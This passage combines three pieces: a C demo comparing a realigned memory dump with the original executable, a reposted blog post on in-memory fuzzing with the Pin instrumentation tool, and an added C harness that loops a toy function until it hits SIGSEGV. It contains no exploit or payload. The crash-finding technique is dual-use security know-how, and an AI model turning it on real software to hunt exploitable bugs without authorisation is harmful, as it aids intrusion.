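/* Fill disk[] and mem[] with the same toy executable, then give mem[] the two kinds of damage
 * the post describes: one page of .text never recovered (zeros) and a loader-style fixup in .data. */
void build_sample(uint8_t *disk, uint8_t *mem) {
    uint8_t text[0x1800], data[0x400];
    for (size_t i = 0; i < sizeof text; i++) text[i] = (uint8_t)(i * 7);    /* stand-in code bytes */
    memset(data, 0x11, 0x300); memset(data + 0x300, 0, 0x100);              /* .data + file padding */
    memset(disk, 0, DISK_SIZE); memset(mem, 0, MEM_SIZE);
    write_headers(disk); write_headers(mem);
    memcpy(disk + 0x400, text, 0x1800); memcpy(disk + 0x1c00, data, 0x400); /* file aligned */
    memcpy(mem + 0x1000, text, 0x1800); memcpy(mem + 0x3000, data, 0x400);  /* page aligned */
    memset(mem + 0x2000, 0, PAGE);                 /* page 0x2000 was paged out: dump holds zeros */
    memcpy(mem + 0x3008, "\xaa\xbb\xcc\xdd", 4);   /* fixup applied by the loader (constructed) */
}

/* filecompare -b 1 equivalent: number of byte positions that differ. */
size_t count_diff(const uint8_t *a, const uint8_t *b, size_t n) {
    size_t d = 0;
    for (size_t i = 0; i < n; i++) d += a[i] != b[i];
    return d;
}

/* One character per block, a text stand-in for a row of colorize pixels:
 * '.' identical, ':' some bytes differ (the "speckled" blocks), '#' at least half differ. */
void diff_map(const uint8_t *a, const uint8_t *b, size_t n, size_t block, char *out) {
    size_t k = 0;
    for (size_t off = 0; off < n; off += block, k++) {
        size_t len = off + block > n ? n - off : block;
        size_t d = count_diff(a + off, b + off, len);
        out[k] = d == 0 ? '.' : (2 * d < len ? ':' : '#');
    }
    out[k] = '\0';
}

/* Whole pipeline on the toy image: bytes that differ between the original file and the recovery. */
size_t demo_diff_count(void) {
    static uint8_t disk[DISK_SIZE], mem[MEM_SIZE], rec[DISK_SIZE];
    build_sample(disk, mem);
    if (realign_to_disk(mem, MEM_SIZE, rec, DISK_SIZE) != DISK_SIZE) return (size_t)-1;
    return count_diff(disk, rec, DISK_SIZE);
}

/* Same run, rendered as a 128-character map with 64-byte blocks. */
const char *demo_map(void) {
    static uint8_t disk[DISK_SIZE], mem[MEM_SIZE], rec[DISK_SIZE];
    static char map[DISK_SIZE / 64 + 1];
    build_sample(disk, mem);
    realign_to_disk(mem, MEM_SIZE, rec, DISK_SIZE);
    diff_map(disk, rec, DISK_SIZE, 64, map);
    return map;
}

int main(void) {
    printf("%zu bytes differ\n%s\n", demo_diff_count(), demo_map());
    return 0;
}
```

The map shows the same three things the post's pictures show: a long identical run (headers and the first .text page), a solid run of '#' where the unrecovered page was zero-filled, and a single ':' block in .data where only the four patched bytes differ. The eight bytes inside the missing page that happen to be zero in the original match the recovered zeros, which is exactly the "speckled" effect the post mentions; that is why the count is 2044 and not 2048 + 4.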
-
In-Memory fuzzing with Pin
by Jonathan Salwan - 2013-08-17

In my previous blog post, I talked about taint analysis and pattern matching with Pin. In this short post, I will again talk about Pin, but this time about In-Memory fuzzing.

1 - In-Memory fuzzing

1.1 - Little introduction

In-Memory fuzzing is a technique which consists of targeting and testing a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code; it is mainly used for a quick analysis. However, it's really straightforward to implement. For that, we just need to:

1. Choose a targeted piece of code.
2. Set a breakpoint before and after our targeted area.
3. Save the execution context when the first breakpoint occurs.
4. Restore the execution context when the second breakpoint occurs.
5. Catch the SIGSEGV signal.
6. Repeat operations 3 and 4 until the crash occurs.

1.2 - Little example

For a little example, see the following graph. Now, imagine that the user can control the first argument; that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested in testing the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", which means we can control the eax register. So, we will apply the In-Memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions and we will fuzz the eax register.

Use the Pin API

The Pin API provides all we need to apply the In-Memory fuzzing technique. To catch the signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like this:

PIN_InterceptSignal(SIGSEGV, catchSignal, 0);

Our callback catchSignal just displays the current context when the signal occurs.
Then, because Pin is a DBI framework (Dynamic Binary Instrumentation), we can't set a breakpoint, but that's not really important. With a DBI framework we can control each instruction before and after its execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instructions occur. A CONTEXT in Pin is just the register state of the processor. That means that when you call PIN_SaveContext(), you save only the state of the registers, not the memory. So, to monitor STORE accesses, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value and we restore it when the context is restored. That's all; you can see the full source code here.

In-Memory fuzzing Pin tool

This Pin tool requires three arguments and can take three optional arguments.

Required
--------
-start <address>                  The start address of the fuzzing area
-end <address>                    The end address of the fuzzing area
-reg <register>                   The register which will be fuzzed

Optional
--------
-startValue <value>               The start value
-maxValue <value>                 The end value
-fuzzingType <"inc" | "random">   Type of fuzzing: incremental or random

If we take the above example and we want to fuzz the orange basic block, we have something like this:

$ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \
    -startValue 1 -maxValue 0x3000 -- ./test 1 > dump
[2] 8472 segmentation fault 0.53s user 0.20s system 99% cpu 0.729 total

I used the "time" command to show you how efficient Pin is. I've also redirected stdout to a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs - Current RIP = 0x4005a5 "movzx eax, byte ptr [rax]" with RAX = 0x2420.
[Restore Context]
[Save Context]
[CONTEXT]=----------------------------------------------------------
RAX = 0000000000002420
RBX = 0000000000000000
RCX = 00007fff3134c168
RDX = 00007fff3134abe0
RDI = 0000000000000001
RSI = 00007fff3134abe0
RBP = 00007fff3134abc0
RSP = 00007fff3134abb0
RIP = 00000000004005a5
+-------------------------------------------------------------------
+--> 4005a5: cdqe
+--> 4005a7: add rax, qword ptr [rbp-0x10]
+--> 4005ab: movzx eax, byte ptr [rax]
/!\ SIGSEGV received /!\
[SIGSGV]=----------------------------------------------------------
RAX = 00007fff3134d000
RBX = 0000000000000000
RCX = 00007fff3134c168
RDX = 00007fff3134abe0
RDI = 0000000000000001
RSI = 00007fff3134abe0
RBP = 00007fff3134abc0
RSP = 00007fff3134abb0
RIP = 00000000004005ab
+-------------------------------------------------------------------

You can download this Pin tool here.

Source: shell-storm | In-Memory fuzzing with Pin
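The save / run / restore / catch-SIGSEGV loop from the six steps above, as an added C example rather than the Pin tool itself. Without Pin there is no way to put the two "breakpoints" around an arbitrary basic block, so the fuzzed region here is a plain C function, the fuzzed register is its idx argument, the register part of the context is kept with sigsetjmp/siglongjmp, the STORE the target performs is undone from a memory snapshot, and the crash is made deterministic with a PROT_NONE guard page. All names, sizes and values are constructed for the demo and are not from Salwan's tool.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE 0x1000

/* Saved execution context (the register part, the role PIN_SaveContext() plays in the tool). */
static sigjmp_buf restore_point;
static volatile sig_atomic_t crashed;

/* Step 5 of the post: catch SIGSEGV and return to the saved context instead of dying. */
static void on_segv(int sig) {
    (void)sig;
    crashed = 1;
    siglongjmp(restore_point, 1);
}

/* Where the target records what it read; volatile keeps the load of buf[idx] from being dropped. */
static volatile unsigned char last_seen;

/* The "orange basic block": a stand-in for cdqe / add rax,[rbp-0x10] / movzx eax,[rax].
 * idx plays the role of the fuzzed register; the write to buf[0] is a STORE the harness must undo. */
static void target(unsigned char *buf, long idx) {
    buf[0] = (unsigned char)idx;
    last_seen = buf[idx];
}

/* Three pages: readable, PROT_NONE, readable. An idx that reaches page 1 faults every time,
 * standing in for the post's RAX landing on an unmapped address. */
unsigned char *make_region(void) {
    unsigned char *p = mmap(NULL, 3 * PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    memset(p, 0x41, 3 * PAGE);
    if (mprotect(p + PAGE, PAGE, PROT_NONE) != 0) { munmap(p, 3 * PAGE); return NULL; }
    return p;
}

/* Incremental fuzzing (the tool's -fuzzingType inc with -startValue/-maxValue): for each value,
 * save the context, run the target, restore the context; stop at the first SIGSEGV.
 * Returns the faulting value, or -1 if no value in [start, max] crashes. */
long fuzz_find_crash(unsigned char *buf, long start, long max) {
    struct sigaction sa, old;
    static unsigned char saved_page[PAGE];    /* memory snapshot: the bytes the target may STORE to */
    unsigned char saved_last = last_seen;
    long crash_at = -1;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, &old) != 0) return -2;

    for (long v = start; v <= max; v++) {
        memcpy(saved_page, buf, PAGE);            /* save context: memory */
        crashed = 0;
        if (sigsetjmp(restore_point, 1) == 0)     /* save context: registers and signal mask */
            target(buf, v);                       /* run the fuzzed block with this value */
        memcpy(buf, saved_page, PAGE);            /* restore context: memory */
        last_seen = saved_last;
        if (crashed) { crash_at = v; break; }
    }
    sigaction(SIGSEGV, &old, NULL);
    return crash_at;
}

/* End-to-end run on a fresh region; also checks that the STORE was undone (buf[0] back to 0x41). */
long find_first_crash(void) {
    unsigned char *region = make_region();
    if (!region) return -2;
    long hit = fuzz_find_crash(region, 1, 0x3000);
    int intact = region[0] == 0x41;
    munmap(region, 3 * PAGE);
    return intact ? hit : -3;
}

int main(void) {
    long hit = find_first_crash();
    if (hit < 0) printf("no crash found (%ld)\n", hit);
    else printf("SIGSEGV with fuzzed value 0x%lx (page 1 is PROT_NONE)\n", hit);
    return 0;
}
```

Two details mirror what the post says about Pin: the register snapshot alone is not enough, so the harness keeps a copy of the page the target writes to and restores it after every iteration (the equivalent of watching INS_MemoryOperandIsWritten), and the signal handler does not try to resume the faulting instruction but jumps back to the saved context, which is all the fuzzer needs to record the value that caused the fault.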